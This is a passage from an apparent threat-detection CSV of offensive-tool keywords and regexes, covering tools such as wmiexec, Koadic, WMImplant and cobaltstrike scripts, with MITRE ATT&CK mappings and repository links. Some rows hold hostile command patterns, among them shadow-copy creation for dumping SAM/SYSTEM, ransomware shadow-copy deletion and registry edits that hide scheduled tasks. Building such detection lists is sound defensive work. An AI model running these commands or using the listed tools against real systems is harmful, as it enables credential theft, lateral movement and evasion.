- T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*WLAN-Windows-Passwords-Discord-Exfiltration*",".{0,1000}WLAN\-Windows\-Passwords\-Discord\-Exfiltration.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*WldpBypass.cs*",".{0,1000}WldpBypass\.cs.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*wl-lic -d *.dat -r *.rsa*",".{0,1000}wl\-lic\s\-d\s.{0,1000}\.dat\s\-r\s.{0,1000}\.rsa.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*wl-lic -h HWID -m main_hash -d regkey2.dat -r regkey2.rsa*",".{0,1000}wl\-lic\s\-h\sHWID\s\-m\smain_hash\s\-d\sregkey2\.dat\s\-r\sregkey2\.rsa.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*wmap_crawler.rb*",".{0,1000}wmap_crawler\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*wmeye.csproj*",".{0,1000}wmeye\.csproj.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","331","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" "*wmeye.exe *",".{0,1000}wmeye\.exe\s.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","0","N/A","N/A","4","331","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" "*wmeye.sln*",".{0,1000}wmeye\.sln.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","331","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" "*Wmi_Persistence.ps1*",".{0,1000}Wmi_Persistence\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*wmi_persistence.rb*",".{0,1000}wmi_persistence\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*WMIBackdoor.ps1*",".{0,1000}WMIBackdoor\.ps1.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","create or remove a backdoor using WMI event subscriptions","T1546.003 - T1059.001 - T1102","TA0005 - TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","10","4","313","89","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z" "*wmic /namespace:\\root\default path stdRegProv call DeleteValue *SOFTWARE\YourSoftware\Schedule\TaskCache\Tree\*=*SD*",".{0,1000}wmic\s\/namespace\:\\\\root\\default\spath\sstdRegProv\scall\sDeleteValue\s.{0,1000}SOFTWARE\\YourSoftware\\Schedule\\TaskCache\\Tree\\.{0,1000}\=.{0,1000}SD.{0,1000}","offensive_tool_keyword","wmic","the threat actor deleted the SD value within the Tree registry path (hide scheduled task creation)","T1562","TA0005","Tarrask Malware","HAFNIUM","Defense Evasion","https://www.microsoft.com/en-us/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/","1","0","risk of False positive","9","10","N/A","N/A","N/A","N/A" "*wmic shadowcopy call create Volume='C:\'*",".{0,1000}wmic\sshadowcopy\scall\screate\sVolume\=\'C\:\\\'.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wmic.exe* Shadowcopy Delete*",".{0,1000}wmic\.exe.{0,1000}\sShadowcopy\sDelete.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wmic/wmic.cmd*",".{0,1000}wmic\/wmic\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*WMIcmd*",".{0,1000}WMIcmd.{0,1000}","offensive_tool_keyword","WMIcmd","This tool allows us to execute commands via WMI and get information not otherwise available via this channel.","T1059.001 - T1021 - T1210.001","TA0002 - TA0007 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/nccgroup/WMIcmd","1","1","N/A","N/A","4","326","77","2017-06-24T18:37:16Z","2017-05-17T06:50:12Z" "*WMICStager*",".{0,1000}WMICStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*wmi-event-lateral-movement.*",".{0,1000}wmi\-event\-lateral\-movement\..{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","321","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*WMI-EventSub.cpp*",".{0,1000}WMI\-EventSub\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*wmiexec *.exe*",".{0,1000}wmiexec\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*WMIExec.git*",".{0,1000}WMIExec\.git.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","157","25","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" "*wmiexec.py -*",".{0,1000}wmiexec\.py\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*WMIEXEC: Could not retrieve output file*",".{0,1000}WMIEXEC\:\sCould\snot\sretrieve\soutput\sfile.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*wmiexec\wmiexec.go*",".{0,1000}wmiexec\\wmiexec\.go.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*wmiexec_scheduledjob.py*",".{0,1000}wmiexec_scheduledjob\.py.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","157","25","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" "*wmiexec_win32process.py*",".{0,1000}wmiexec_win32process\.py.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","157","25","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" "*wmiexec2.0.py*",".{0,1000}wmiexec2\.0\.py.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","20","1","2023-12-27T03:54:26Z","2023-02-07T22:10:08Z" "*wmiexec2.py*",".{0,1000}wmiexec2\.py.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","20","1","2023-12-27T03:54:26Z","2023-02-07T22:10:08Z" "*wmiexec2-main*",".{0,1000}wmiexec2\-main.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","20","1","2023-12-27T03:54:26Z","2023-02-07T22:10:08Z" "*WMIExecHash.*",".{0,1000}WMIExecHash\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*WMIExecHash.boo",".{0,1000}WMIExecHash\.boo","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*WMIExec-main*",".{0,1000}WMIExec\-main.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","157","25","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" "*wmiexec-Pro.git*",".{0,1000}wmiexec\-Pro\.git.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*wmiexec-pro.py*",".{0,1000}wmiexec\-pro\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*wmiexec-Pro/tarball*",".{0,1000}wmiexec\-Pro\/tarball.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*wmiexec-Pro/zipball*",".{0,1000}wmiexec\-Pro\/zipball.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*wmi-lateral-movement.*",".{0,1000}wmi\-lateral\-movement\..{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","321","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*WMImplant*",".{0,1000}WMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*WMIPersist.*",".{0,1000}WMIPersist\..{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","2","112","29","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z" "*wmipersist.py*",".{0,1000}wmipersist\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*wmipersist.py*",".{0,1000}wmipersist\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*wmipersistence.py*",".{0,1000}wmipersistence\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*WMIPersistence.vbs*",".{0,1000}WMIPersistence\.vbs.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*WMIPersistImplant*",".{0,1000}WMIPersistImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*WMI-ProcessCreate.cpp*",".{0,1000}WMI\-ProcessCreate\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 